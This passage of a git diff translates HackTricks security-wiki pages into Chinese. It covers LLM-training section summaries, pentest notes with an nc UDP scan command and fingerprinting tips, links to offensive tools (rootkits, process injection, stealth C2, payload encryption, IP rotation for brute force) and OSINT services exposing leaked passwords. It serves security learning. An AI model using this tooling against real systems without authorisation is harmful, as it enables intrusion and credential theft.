-> The goal of this fourth phase is very simple: **Apply some attetion mechanisms**. These are going to be a lot of **repeated layers** that are going to **capture the relation of a word in the vocabulary with its neighbours in the current sentence being used to train the LLM**.\
-> A lot of layers are used for this, so a lot of trainable parameters are going to be capturing this information.
+> 这个第四阶段的目标非常简单：**应用一些注意机制**。这些将是许多**重复的层**，将**捕捉词汇表中单词与当前用于训练 LLM 的句子中其邻居的关系**。\
+> 为此使用了许多层，因此许多可训练的参数将捕捉这些信息。
 
 {{#ref}}
 4.-attention-mechanisms.md
 {{#endref}}
 
-## 5. LLM Architecture
+## 5. LLM 架构
 
 > [!TIP]
-> The goal of this fifth phase is very simple: **Develop the architecture of the full LLM**. Put everything together, apply all the layers and create all the functions to generate text or transform text to IDs and backwards.
+> 这个第五阶段的目标非常简单：**开发完整 LLM 的架构**。将所有内容组合在一起，应用所有层并创建所有函数以生成文本或将文本转换为 ID 及其反向操作。
 >
-> This architecture will be used for both, training and predicting text after it was trained.
+> 该架构将用于训练和预测文本。
 
 {{#ref}}
 5.-llm-architecture.md
 {{#endref}}
 
-## 6. Pre-training & Loading models
+## 6. 预训练与加载模型
 
 > [!TIP]
-> The goal of this sixth phase is very simple: **Train the model from scratch**. For this the previous LLM architecture will be used with some loops going over the data sets using the defined loss functions and optimizer to train all the parameters of the model.
+> 这个第六阶段的目标非常简单：**从头开始训练模型**。为此，将使用之前的 LLM 架构，通过对数据集进行循环，使用定义的损失函数和优化器来训练模型的所有参数。
 
 {{#ref}}
 6.-pre-training-and-loading-models.md
 {{#endref}}
 
-## 7.0. LoRA Improvements in fine-tuning
+## 7.0. LoRA 在微调中的改进
 
 > [!TIP]
-> The use of **LoRA reduce a lot the computation** needed to **fine tune** already trained models.
+> 使用**LoRA 大大减少了微调**已训练模型所需的计算。
 
 {{#ref}}
 7.0.-lora-improvements-in-fine-tuning.md
 {{#endref}}
 
-## 7.1. Fine-Tuning for Classification
+## 7.1. 分类的微调
 
 > [!TIP]
-> The goal of this section is to show how to fine-tune an already pre-trained model so instead of generating new text the LLM will select give the **probabilities of the given text being categorized in each of the given categories** (like if a text is spam or not).
+> 本节的目标是展示如何微调一个已经预训练的模型，以便 LLM 不再生成新文本，而是给出**给定文本被分类到每个给定类别的概率**（例如，文本是否为垃圾邮件）。
 
 {{#ref}}
 7.1.-fine-tuning-for-classification.md
 {{#endref}}
 
-## 7.2. Fine-Tuning to follow instructions
+## 7.2. 按照指令进行微调
 
 > [!TIP]
-> The goal of this section is to show how to **fine-tune an already pre-trained model to follow instructions** rather than just generating text, for example, responding to tasks as a chat bot.
+> 本节的目标是展示如何**微调一个已经预训练的模型以遵循指令**，而不仅仅是生成文本，例如，作为聊天机器人响应任务。
 
 {{#ref}}
 7.2.-fine-tuning-to-follow-instructions.md
 {{#endref}}
-
diff --git a/src/todo/misc.md b/src/todo/misc.md
index 3e00501dd..8cd6d5361 100644
--- a/src/todo/misc.md
+++ b/src/todo/misc.md
@@ -1,38 +1,36 @@
 {{#include ../banners/hacktricks-training.md}}
 
-In a ping response TTL:\
+在 ping 响应 TTL：\
 127 = Windows\
 254 = Cisco\
-Lo demás,algunlinux
+其他，某些 Linux
 
 $1$- md5\
-$2$or $2a$ - Blowfish\
+$2$或 $2a$ - Blowfish\
 $5$- sha256\
 $6$- sha512
 
-If you do not know what is behind a service, try to make and HTTP GET request.
+如果你不知道某个服务背后是什么，尝试发起一个 HTTP GET 请求。
 
-**UDP Scans**\
+**UDP 扫描**\
 nc -nv -u -z -w 1 \<IP> 160-16
 
-An empty UDP packet is sent to a specific port. If the UDP port is open, no reply is sent back from the target machine. If the UDP port is closed, an ICMP port unreachable packet should be sent back from the target machine.\
+一个空的 UDP 数据包被发送到特定端口。如果 UDP 端口是开放的，目标机器不会回复。如果 UDP 端口是关闭的，目标机器应该会发送一个 ICMP 端口不可达的数据包。\
 
-UDP port scanning is often unreliable, as firewalls and routers may drop ICMP\
- packets. This can lead to false positives in your scan, and you will regularly see\
- UDP port scans showing all UDP ports open on a scanned machine.\
- o Most port scanners do not scan all available ports, and usually have a preset list\
- of “interesting ports” that are scanned.
+UDP 端口扫描通常不可靠，因为防火墙和路由器可能会丢弃 ICMP\
+数据包。这可能导致扫描中的假阳性，你会经常看到\
+UDP 端口扫描显示被扫描机器上的所有 UDP 端口都是开放的。\
+大多数端口扫描器不会扫描所有可用端口，通常有一个预设的“有趣端口”列表\
+进行扫描。
 
-# CTF - Tricks
-
-In **Windows** use **Winzip** to search for files.\
-**Alternate data Streams**: _dir /r | find ":$DATA"_\
+# CTF - 技巧
 
+在 **Windows** 上使用 **Winzip** 搜索文件。\
+**备用数据流**：_dir /r | find ":$DATA"_\
 ```
 binwalk --dd=".*" <file> #Extract everything
 binwalk -M -e -d=10000 suspicious.pdf #Extract, look inside extracted files and continue extracing (depth of 10000)
 ```
-
 ## Crypto
 
 **featherduster**\
@@ -40,22 +38,21 @@ binwalk -M -e -d=10000 suspicious.pdf #Extract, look inside extracted files and
 **Basae64**(6—>8) —> 0...9, a...z, A…Z,+,/\
 **Base32**(5 —>8) —> A…Z, 2…7\
 **Base85** (Ascii85, 7—>8) —> 0...9, a...z, A...Z, ., -, :, +, =, ^, !, /, \*, ?, &, <, >, (, ), \[, ], {, }, @, %, $, #\
-**Uuencode** --> Start with "_begin \<mode> \<filename>_" and weird chars\
-**Xxencoding** --> Start with "_begin \<mode> \<filename>_" and B64\
+**Uuencode** --> Start with "_begin \<mode> \<filename>_" 和奇怪的字符\
+**Xxencoding** --> Start with "_begin \<mode> \<filename>_" 和 B64\
 \
-**Vigenere** (frequency analysis) —> [https://www.guballa.de/vigenere-solver](https://www.guballa.de/vigenere-solver)\
-**Scytale** (offset of characters) —> [https://www.dcode.fr/scytale-cipher](https://www.dcode.fr/scytale-cipher)
+**Vigenere** (频率分析) —> [https://www.guballa.de/vigenere-solver](https://www.guballa.de/vigenere-solver)\
+**Scytale** (字符偏移) —> [https://www.dcode.fr/scytale-cipher](https://www.dcode.fr/scytale-cipher)
 
 **25x25 = QR**
 
 factordb.com\
 rsatool
 
-Snow --> Hide messages using spaces and tabs
+Snow --> 使用空格和制表符隐藏消息
 
 # Characters
 
-%E2%80%AE => RTL Character (writes payloads backwards)
+%E2%80%AE => RTL 字符 (反向书写有效载荷)
 
 {{#include ../banners/hacktricks-training.md}}
-
diff --git a/src/todo/more-tools.md b/src/todo/more-tools.md
index 380fe4b8a..c647baeab 100644
--- a/src/todo/more-tools.md
+++ b/src/todo/more-tools.md
@@ -4,12 +4,12 @@
 
 {% embed url="https://websec.nl/" %}
 
-# BlueTeam
+# 蓝队
 
 - [https://github.com/yarox24/attack_monitor](https://github.com/yarox24/attack_monitor)
 - [https://capsule8.com/blog/dont-get-kicked-out-a-tale-of-rootkits-and-other-backdoors/](https://capsule8.com/blog/dont-get-kicked-out-a-tale-of-rootkits-and-other-backdoors/)
 - [https://github.com/ION28/BLUESPAWN](https://github.com/ION28/BLUESPAWN)
-- [https://github.com/PaperMtn/lil-pwny](https://github.com/PaperMtn/lil-pwny) : Check disclosed accounts
+- [https://github.com/PaperMtn/lil-pwny](https://github.com/PaperMtn/lil-pwny) : 检查泄露的账户
 - [https://github.com/rabobank-cdc/DeTTECT](https://github.com/rabobank-cdc/DeTTECT)
 
 # OSINT
@@ -31,7 +31,7 @@
 - [https://builtwith.com/](https://builtwith.com)
 - [https://www.spiderfoot.net/](https://www.spiderfoot.net)
 - [https://github.com/zricethezav/gitleaks](https://github.com/zricethezav/gitleaks)
-- [https://www.nmmapper.com/sys/tools/subdomainfinder/](https://www.nmmapper.com/sys/tools/subdomainfinder/) : 8 Subdomain finder tools, sublist3r, amass and more
+- [https://www.nmmapper.com/sys/tools/subdomainfinder/](https://www.nmmapper.com/sys/tools/subdomainfinder/) : 8个子域名查找工具，sublist3r，amass等
 
 # **WEB**
 
@@ -40,88 +40,87 @@
 - [https://github.com/hahwul/XSpear](https://github.com/hahwul/XSpear)
 - [https://github.com/BitTheByte/Monitorizer/](https://github.com/BitTheByte/Monitorizer/)
 - [https://github.com/spinkham/skipfish](https://github.com/spinkham/skipfish)
-- [https://github.com/blark/aiodnsbrute](https://github.com/blark/aiodnsbrute) : Brute force domain names asynchronously
-- [https://crt.sh/?q=%.yahoo.com](https://crt.sh/?q=%.yahoo.com) : Subdomain bruteforce
-- [https://github.com/tomnomnom/httprobe](https://github.com/tomnomnom/httprobe): Check if web servers in a domain are accessible
-- [https://github.com/aboul3la/Sublist3r](https://github.com/aboul3la/Sublist3r) : Subdomain discovery
-- [https://github.com/gwen001/github-search/blob/master/github-subdomains.py](https://github.com/gwen001/github-search/blob/master/github-subdomains.py) : Subdomain discovery in github
-- [https://github.com/robertdavidgraham/masscan](https://github.com/robertdavidgraham/masscan) : Fast port scanning
-- [https://github.com/Threezh1/JSFinder](https://github.com/Threezh1/JSFinder) : Subdomains and URLs from JS files in a web
-- [https://github.com/C1h2e1/MyFuzzingDict](https://github.com/C1h2e1/MyFuzzingDict) : Web files dictionary
-- [https://github.com/TypeError/Bookmarks/blob/master/README.md](https://github.com/TypeError/Bookmarks/blob/master/README.md) : BurpExtension to avoid dozens repeater tabs
-- [https://github.com/hakluke/hakrawler](https://github.com/hakluke/hakrawler) : Obtain assets
+- [https://github.com/blark/aiodnsbrute](https://github.com/blark/aiodnsbrute) : 异步暴力破解域名
+- [https://crt.sh/?q=%.yahoo.com](https://crt.sh/?q=%.yahoo.com) : 子域名暴力破解
+- [https://github.com/tomnomnom/httprobe](https://github.com/tomnomnom/httprobe): 检查域中的Web服务器是否可访问
+- [https://github.com/aboul3la/Sublist3r](https://github.com/aboul3la/Sublist3r) : 子域名发现
+- [https://github.com/gwen001/github-search/blob/master/github-subdomains.py](https://github.com/gwen001/github-search/blob/master/github-subdomains.py) : 在github中发现子域名
+- [https://github.com/robertdavidgraham/masscan](https://github.com/robertdavidgraham/masscan) : 快速端口扫描
+- [https://github.com/Threezh1/JSFinder](https://github.com/Threezh1/JSFinder) : 从Web中的JS文件获取子域名和URL
+- [https://github.com/C1h2e1/MyFuzzingDict](https://github.com/C1h2e1/MyFuzzingDict) : Web文件字典
+- [https://github.com/TypeError/Bookmarks/blob/master/README.md](https://github.com/TypeError/Bookmarks/blob/master/README.md) : Burp扩展以避免多个重复标签
+- [https://github.com/hakluke/hakrawler](https://github.com/hakluke/hakrawler) : 获取资产
 - [https://github.com/izo30/google-dorker](https://github.com/izo30/google-dorker) : Google dorks
-- [https://github.com/sehno/Bug-bounty/blob/master/bugbounty_checklist.md](https://github.com/sehno/Bug-bounty/blob/master/bugbounty_checklist.md) : Web BugBounty checklist
-- [https://github.com/Naategh/dom-red](https://github.com/Naategh/dom-red) : Check a list of domain against Open Redirection
-- [https://github.com/prodigysml/Dr.-Watson](https://github.com/prodigysml/Dr.-Watson) : Burp plugin, offline analysis to discover domains, subdomains and IPs
-- [https://github.com/hahwul/WebHackersWeapons](https://github.com/hahwul/WebHackersWeapons): List of different tools
-- [https://github.com/gauravnarwani97/Trishul](https://github.com/gauravnarwani97/Trishul) : BurpSuite Plugingto find vulns (SQLi, XSS, SSTI)
-- [https://github.com/fransr/postMessage-tracker](https://github.com/fransr/postMessage-tracker) : Chrome extension for tracking post-messages functions
-- [https://github.com/Quitten/Autorize](https://github.com/Quitten/Autorize) : Automatic authentication tests (remove cookies and try to send the request)
-- [https://github.com/pikpikcu/xrcross](https://github.com/pikpikcu/xrcross): XRCross is a Reconstruction, Scanner, and a tool for penetration / BugBounty testing. This tool was built to test (XSS|SSRF|CORS|SSTI|IDOR|RCE|LFI|SQLI) vulnerabilities
+- [https://github.com/sehno/Bug-bounty/blob/master/bugbounty_checklist.md](https://github.com/sehno/Bug-bounty/blob/master/bugbounty_checklist.md) : Web BugBounty检查清单
+- [https://github.com/Naategh/dom-red](https://github.com/Naategh/dom-red) : 检查域列表以防止开放重定向
+- [https://github.com/prodigysml/Dr.-Watson](https://github.com/prodigysml/Dr.-Watson) : Burp插件，离线分析以发现域、子域和IP
+- [https://github.com/hahwul/WebHackersWeapons](https://github.com/hahwul/WebHackersWeapons): 不同工具的列表
+- [https://github.com/gauravnarwani97/Trishul](https://github.com/gauravnarwani97/Trishul) : BurpSuite插件以查找漏洞（SQLi，XSS，SSTI）
+- [https://github.com/fransr/postMessage-tracker](https://github.com/fransr/postMessage-tracker) : 用于跟踪post-messages函数的Chrome扩展
+- [https://github.com/Quitten/Autorize](https://github.com/Quitten/Autorize) : 自动身份验证测试（删除cookies并尝试发送请求）
+- [https://github.com/pikpikcu/xrcross](https://github.com/pikpikcu/xrcross): XRCross是一个重建、扫描器和渗透/ BugBounty测试工具。该工具旨在测试（XSS|SSRF|CORS|SSTI|IDOR|RCE|LFI|SQLI）漏洞
 
 # Windows
 
-- [https://github.com/Mr-Un1k0d3r/PoisonHandler](https://github.com/Mr-Un1k0d3r/PoisonHandler) : Lateral movements
+- [https://github.com/Mr-Un1k0d3r/PoisonHandler](https://github.com/Mr-Un1k0d3r/PoisonHandler) : 横向移动
 - [https://freddiebarrsmith.com/trix/trix.html](https://freddiebarrsmith.com/trix/trix.html) : LOL bins
-- [https://gist.github.com/netbiosX/ee35fcd3722e401a38136cff7b751d79](https://gist.github.com/netbiosX/ee35fcd3722e401a38136cff7b751d79) ([https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/](https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/)): Persistence
-- [https://github.com/odzhan/injection](https://github.com/odzhan/injection) : Windows Process Injection techniques
-- [https://github.com/BankSecurity/Red_Team](https://github.com/BankSecurity/Red_Team) : Red Team scripts
-- [https://github.com/l0ss/Grouper2](https://github.com/l0ss/Grouper2) : find security-related misconfigurations in Active Directory Group Policy.
-- [https://www.wietzebeukema.nl/blog/powershell-obfuscation-using-securestring](https://www.wietzebeukema.nl/blog/powershell-obfuscation-using-securestring) : Securestring obfuscation
-- [https://pentestlab.blog/2020/02/24/parent-pid-spoofing/](https://pentestlab.blog/2020/02/24/parent-pid-spoofing/) : Parent PID Spoofing
-- [https://github.com/the-xentropy/xencrypt](https://github.com/the-xentropy/xencrypt) : Encrypt Powershell payloads
-- [https://shells.systems/introducing-ninja-c2-the-c2-built-for-stealth-red-team-operations/](https://shells.systems/introducing-ninja-c2-the-c2-built-for-stealth-red-team-operations/) : Stealth C2
-- [https://windows-internals.com/faxing-your-way-to-system/](https://windows-internals.com/faxing-your-way-to-system/) : Series of logs about Windows Internals
-- [https://bestestredteam.com/2018/10/02/tracking-pixel-in-microsoft-office-document/](https://bestestredteam.com/2018/10/02/tracking-pixel-in-microsoft-office-document/) : Track who open a document
-- [https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet](https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet) : Active Directory Cheat Sheet
+- [https://gist.github.com/netbiosX/ee35fcd3722e401a38136cff7b751d79](https://gist.github.com/netbiosX/ee35fcd3722e401a38136cff7b751d79) ([https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/](https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/)): 持久性
+- [https://github.com/odzhan/injection](https://github.com/odzhan/injection) : Windows进程注入技术
+- [https://github.com/BankSecurity/Red_Team](https://github.com/BankSecurity/Red_Team) : 红队脚本
+- [https://github.com/l0ss/Grouper2](https://github.com/l0ss/Grouper2) : 查找Active Directory组策略中的安全相关错误配置。
+- [https://www.wietzebeukema.nl/blog/powershell-obfuscation-using-securestring](https://www.wietzebeukema.nl/blog/powershell-obfuscation-using-securestring) : Securestring混淆
+- [https://pentestlab.blog/2020/02/24/parent-pid-spoofing/](https://pentestlab.blog/2020/02/24/parent-pid-spoofing/) : 父PID欺骗
+- [https://github.com/the-xentropy/xencrypt](https://github.com/the-xentropy/xencrypt) : 加密Powershell有效载荷
+- [https://shells.systems/introducing-ninja-c2-the-c2-built-for-stealth-red-team-operations/](https://shells.systems/introducing-ninja-c2-the-c2-built-for-stealth-red-team-operations/) : 隐蔽C2
+- [https://windows-internals.com/faxing-your-way-to-system/](https://windows-internals.com/faxing-your-way-to-system/) : 关于Windows内部的日志系列
+- [https://bestestredteam.com/2018/10/02/tracking-pixel-in-microsoft-office-document/](https://bestestredteam.com/2018/10/02/tracking-pixel-in-microsoft-office-document/) : 跟踪谁打开了文档
+- [https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet](https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet) : Active Directory备忘单
 
-# Firmware
+# 固件
 
-Tools q veo q pueden molar para analizar firmares (automaticas):
+可以用于分析固件的工具（自动化）：
 
 - [https://github.com/craigz28/firmwalker](https://github.com/craigz28/firmwalker)
 - [https://github.com/fkie-cad/FACT_core](https://github.com/fkie-cad/FACT_core)
 - [https://gitlab.com/bytesweep/bytesweep-go](https://gitlab.com/bytesweep/bytesweep-go)
 
-Post-crema:
+后期内容：
 
 - [https://blog.mindedsecurity.com/2018/09/pentesting-iot-devices-part-1-static.html](https://blog.mindedsecurity.com/2018/09/pentesting-iot-devices-part-1-static.html)
 - [https://blog.mindedsecurity.com/2018/10/pentesting-iot-devices-part-2-dynamic.html](https://blog.mindedsecurity.com/2018/10/pentesting-iot-devices-part-2-dynamic.html)
 
-Como extraer firmware si no lo encontramos online: [https://www.youtube.com/watch?v=Kxvpbu9STU4](https://www.youtube.com/watch?v=Kxvpbu9STU4)
+如果我们在线找不到固件，如何提取固件：[https://www.youtube.com/watch?v=Kxvpbu9STU4](https://www.youtube.com/watch?v=Kxvpbu9STU4)
 
-Aqui un firware con vulnerabilidades para analizar: [https://github.com/scriptingxss/IoTGoat](https://github.com/scriptingxss/IoTGoat)
+这里有一个有漏洞的固件供分析：[https://github.com/scriptingxss/IoTGoat](https://github.com/scriptingxss/IoTGoat)
 
-y por aqui la metodologia owasp para analizar firmware: [https://github.com/scriptingxss/owasp-fstm](https://github.com/scriptingxss/owasp-fstm)
+以及这里的OWASP固件分析方法论：[https://github.com/scriptingxss/owasp-fstm](https://github.com/scriptingxss/owasp-fstm)
 
-Firmware emulation: FIRMADYNE (https://github.com/firmadyne/firmadyne/) is a platform for automating the emulation and dynamic analysis of Linux-based firmware.
+固件仿真：FIRMADYNE (https://github.com/firmadyne/firmadyne/) 是一个用于自动化Linux固件仿真和动态分析的平台。
 
-# OTHER
+# 其他
 
 - [https://twitter.com/HackAndDo/status/1202695084543791117](https://twitter.com/HackAndDo/status/1202695084543791117)
 - [https://github.com/weev3/LKWA](https://github.com/weev3/LKWA)
 - [https://h0mbre.github.io/Learn-C-By-Creating-A-Rootkit/](https://h0mbre.github.io/Learn-C-By-Creating-A-Rootkit/)
 - [https://github.com/skelsec/jackdaw](https://github.com/skelsec/jackdaw)
-- [https://github.com/CoatiSoftware/Sourcetrail](https://github.com/CoatiSoftware/Sourcetrail) : Static code analysis
+- [https://github.com/CoatiSoftware/Sourcetrail](https://github.com/CoatiSoftware/Sourcetrail) : 静态代码分析
 - [https://www.hackerdecabecera.com/2019/12/blectf-capture-flag-en-formato-hardware.html](https://www.hackerdecabecera.com/2019/12/blectf-capture-flag-en-formato-hardware.html) : Bluetooth LE CTF
-- [https://github.com/skeeto/endlessh](https://github.com/skeeto/endlessh) : SSH tarpit that slowly sends an endless banner.
-- AWS and Cloud tools: [https://github.com/toniblyx/my-arsenal-of-aws-security-tools](https://github.com/toniblyx/my-arsenal-of-aws-security-tools)
-- IFS (Interplanetary File System) for phising: [https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/using-the-interplanetary-file-system-for-offensive-operations/](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/using-the-interplanetary-file-system-for-offensive-operations/)
-- IP rotation services: [https://medium.com/@lokeshdlk77/how-to-rotate-ip-address-in-brute-force-attack-e66407259212](https://medium.com/@lokeshdlk77/how-to-rotate-ip-address-in-brute-force-attack-e66407259212)
-- Linux rootkit: [https://github.com/aesophor/satanic-rootkit](https://github.com/aesophor/satanic-rootkit)
-- [https://theia-ide.org/](https://theia-ide.org) : Online IDE
-- [https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters/](https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters/) : Resources for starting on BugBounties
-- [https://medium.com/macoclock/jailbreak-and-stuff-kickstart-tools-and-techniques-for-ios-application-pentesting-6fa53a3987ab](https://medium.com/macoclock/jailbreak-and-stuff-kickstart-tools-and-techniques-for-ios-application-pentesting-6fa53a3987ab) : IOS pentesting tools
-- [https://github.com/random-robbie/keywords/blob/master/keywords.txt](https://github.com/random-robbie/keywords/blob/master/keywords.txt) : Keywords
-- [https://github.com/ElevenPaths/HomePWN](https://github.com/ElevenPaths/HomePWN) : Hacking IoT (Wifi, BLE, SSDP, MDNS)
-- [https://github.com/rackerlabs/scantron](https://github.com/rackerlabs/scantron) : automating scanning
-- [https://github.com/doyensec/awesome-electronjs-hacking](https://github.com/doyensec/awesome-electronjs-hacking) : This list aims to cover Electron.js security related topics.
-- [https://github.com/serain/bbrecon](https://github.com/serain/bbrecon) : Info about BB programs
+- [https://github.com/skeeto/endlessh](https://github.com/skeeto/endlessh) : SSH tarpit，缓慢发送无尽的横幅。
+- AWS和云工具：[https://github.com/toniblyx/my-arsenal-of-aws-security-tools](https://github.com/toniblyx/my-arsenal-of-aws-security-tools)
+- 用于钓鱼的IFS（星际文件系统）：[https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/using-the-interplanetary-file-system-for-offensive-operations/](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/using-the-interplanetary-file-system-for-offensive-operations/)
+- IP轮换服务：[https://medium.com/@lokeshdlk77/how-to-rotate-ip-address-in-brute-force-attack-e66407259212](https://medium.com/@lokeshdlk77/how-to-rotate-ip-address-in-brute-force-attack-e66407259212)
+- Linux rootkit：[https://github.com/aesophor/satanic-rootkit](https://github.com/aesophor/satanic-rootkit)
+- [https://theia-ide.org/](https://theia-ide.org) : 在线IDE
+- [https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters/](https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters/) : 开始BugBounties的资源
+- [https://medium.com/macoclock/jailbreak-and-stuff-kickstart-tools-and-techniques-for-ios-application-pentesting-6fa53a3987ab](https://medium.com/macoclock/jailbreak-and-stuff-kickstart-tools-and-techniques-for-ios-application-pentesting-6fa53a3987ab) : IOS渗透测试工具
+- [https://github.com/random-robbie/keywords/blob/master/keywords.txt](https://github.com/random-robbie/keywords/blob/master/keywords.txt) : 关键词
+- [https://github.com/ElevenPaths/HomePWN](https://github.com/ElevenPaths/HomePWN) : 黑客IoT（Wifi，BLE，SSDP，MDNS）
+- [https://github.com/rackerlabs/scantron](https://github.com/rackerlabs/scantron) : 自动化扫描
+- [https://github.com/doyensec/awesome-electronjs-hacking](https://github.com/doyensec/awesome-electronjs-hacking) : 此列表旨在涵盖Electron.js安全相关主题。
+- [https://github.com/serain/bbrecon](https://github.com/serain/bbrecon) : 有关BB程序的信息
 
 <figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
 {{#include ../banners/hacktricks-training.md}}
-
diff --git a/src/todo/online-platforms-with-api.md b/src/todo/online-platforms-with-api.md
index 3c12740af..5810916fb 100644
--- a/src/todo/online-platforms-with-api.md
+++ b/src/todo/online-platforms-with-api.md
@@ -1,128 +1,127 @@
-# Online Platforms with API
+# 在线平台与API
 
 {{#include ../banners/hacktricks-training.md}}
 
 ## [ProjectHoneypot](https://www.projecthoneypot.org/)
 
-You can ask if an IP is related to suspicious/malicious activities. Completely free.
+您可以询问某个IP是否与可疑/恶意活动相关。完全免费。
 
 ## [**BotScout**](http://botscout.com/api.htm)
 
-Check if the IP address is related to a bot that register accounts. It can also check usernames and emails. Initially free.
+检查IP地址是否与注册账户的机器人相关。它还可以检查用户名和电子邮件。最初免费。
 
 ## [Hunter](https://hunter.io/)
 
-Find and verify emails.\
-Some free API requests free, for more you need to pay.\
-Commercial?
+查找和验证电子邮件。\
+一些免费API请求，更多需要付费。\
+商业？
 
 ## [AlientVault](https://otx.alienvault.com/api)
 
-Find Malicious activities related to IPs and Domains. Free.
+查找与IP和域名相关的恶意活动。免费。
 
 ## [Clearbit](https://dashboard.clearbit.com/)
 
-Find related personal data to a email (profiles on other platforms), domain (basic company info ,mails and people working) and companies (get company info from mail).\
-You need to pay to access all the possibilities.\
-Commercial?
+查找与电子邮件（其他平台上的个人资料）、域名（基本公司信息、邮件和工作的人）和公司（从邮件获取公司信息）相关的个人数据。\
+您需要付费才能访问所有可能性。\
+商业？
 
 ## [BuiltWith](https://builtwith.com/)
 
-Technologies used by webs. Expensive...\
-Commercial?
+网站使用的技术。昂贵...\
+商业？
 
 ## [Fraudguard](https://fraudguard.io/)
 
-Check if a host (domain or IP) is related with suspicious/malicious activities. Have some free API access.\
-Commercial?
+检查主机（域名或IP）是否与可疑/恶意活动相关。提供一些免费API访问。\
+商业？
 
 ## [FortiGuard](https://fortiguard.com/)
 
-Check if a host (domain or IP) is related with suspicious/malicious activities. Have some free API access.
+检查主机（域名或IP）是否与可疑/恶意活动相关。提供一些免费API访问。
 
 ## [SpamCop](https://www.spamcop.net/)
 
-Indicates if host is related to spam activity. Have some free API access.
+指示主机是否与垃圾邮件活动相关。提供一些免费API访问。
 
 ## [mywot](https://www.mywot.com/)
 
-Based on opinions and other metrics get if a domain is related with suspicious/malicious information.
+基于意见和其他指标判断某个域名是否与可疑/恶意信息相关。
 
 ## [ipinfo](https://ipinfo.io/)
 
-Obtains basic info from an IP address. You can test up to 100K/month.
+获取IP地址的基本信息。您每月可以测试最多100K。
 
 ## [securitytrails](https://securitytrails.com/app/account)
 
-This platform give information about domains and IP addresses like domains inside an IP or inside a domain server, domains owned by an email (find related domains), IP history of domains (find the host behind CloudFlare), all domains using a nameserver....\
-You have some free access.
+该平台提供有关域名和IP地址的信息，例如IP或域名服务器内的域名、由电子邮件拥有的域名（查找相关域名）、域名的IP历史（查找CloudFlare背后的主机）、使用某个名称服务器的所有域名....\
+您有一些免费访问。
 
 ## [fullcontact](https://www.fullcontact.com/)
 
-Allows to search by email, domain or company name and retrieve "personal" information related. It can also verify emails. There is some free access.
+允许通过电子邮件、域名或公司名称进行搜索并检索相关的“个人”信息。它还可以验证电子邮件。有一些免费访问。
 
 ## [RiskIQ](https://www.spiderfoot.net/documentation/)
 
-A lot of information from domains and IPs even in the free/community version.
+即使在免费/社区版本中，也有大量关于域名和IP的信息。
 
 ## [\_IntelligenceX](https://intelx.io/)
 
-Search Domains, IPs and emails and get info from dumps. Have some free access.
+搜索域名、IP和电子邮件并获取来自数据泄露的信息。提供一些免费访问。
 
 ## [IBM X-Force Exchange](https://exchange.xforce.ibmcloud.com/)
 
-Search by IP and gather information related to suspicions activities. There is some free access.
+通过IP搜索并收集与可疑活动相关的信息。提供一些免费访问。
 
 ## [Greynoise](https://viz.greynoise.io/)
 
-Search by IP or IP range and get information about IPs scanning the Internet. 15 days free access.
+通过IP或IP范围搜索并获取有关扫描互联网的IP的信息。15天免费访问。
 
 ## [Shodan](https://www.shodan.io/)
 
-Get scan information of an IP address. Have some free api access.
+获取IP地址的扫描信息。提供一些免费API访问。
 
 ## [Censys](https://censys.io/)
 
-Very similar to shodan
+与shodan非常相似
 
 ## [buckets.grayhatwarfare.com](https://buckets.grayhatwarfare.com/)
 
-Find open S3 buckets searching by keyword.
+通过关键字查找开放的S3桶。
 
 ## [Dehashed](https://www.dehashed.com/data)
 
-Find leaked credentials of emails and even domains\
-Commercial?
+查找电子邮件甚至域名的泄露凭据\
+商业？
 
 ## [psbdmp](https://psbdmp.ws/)
 
-Search pastebins where a email appeared. Commercial?
+搜索电子邮件出现的pastebins。商业？
 
 ## [emailrep.io](https://emailrep.io/key)
 
-Get reputation of a mail. Commercial?
+获取邮件的声誉。商业？
 
 ## [ghostproject](https://ghostproject.fr/)
 
-Get passwords from leaked emails. Commercial?
+获取泄露电子邮件的密码。商业？
 
 ## [Binaryedge](https://www.binaryedge.io/)
 
-Obtain interesting info from IPs
+从IP获取有趣的信息
 
 ## [haveibeenpwned](https://haveibeenpwned.com/)
 
-Search by domain and email and get if it was pwned and passwords. Commercial?
+通过域名和电子邮件搜索并获取是否被攻破及密码。商业？
 
 ### [IP2Location.io](https://www.ip2location.io/)
 
-It detects IP geolocation, data center, ASN and even VPN information. It offers free 30K queries per month.
+它检测IP地理位置、数据中心、ASN甚至VPN信息。每月提供免费30K查询。
 
-[https://dnsdumpster.com/](https://dnsdumpster.com/)(in a commercial tool?)
+[https://dnsdumpster.com/](https://dnsdumpster.com/)(在商业工具中？)
 
-[https://www.netcraft.com/](https://www.netcraft.com/) (in a commercial tool?)
+[https://www.netcraft.com/](https://www.netcraft.com/) (在商业工具中？)
 
-[https://www.nmmapper.com/sys/tools/subdomainfinder/](https://www.nmmapper.com/) (in a commercial tool?)
+[https://www.nmmapper.com/sys/tools/subdomainfinder/](https://www.nmmapper.com/) (在商业工具中？)
 
 {{#include ../banners/hacktricks-training.md}}
-
diff --git a/src/todo/other-web-tricks.md b/src/todo/other-web-tricks.md
index 265b2ef1e..7c281f9f2 100644
--- a/src/todo/other-web-tricks.md
+++ b/src/todo/other-web-tricks.md
@@ -1,36 +1,35 @@
-# Other Web Tricks
+# 其他网络技巧
 
 {{#include ../banners/hacktricks-training.md}}
 
-### Host header
+### 主机头
 
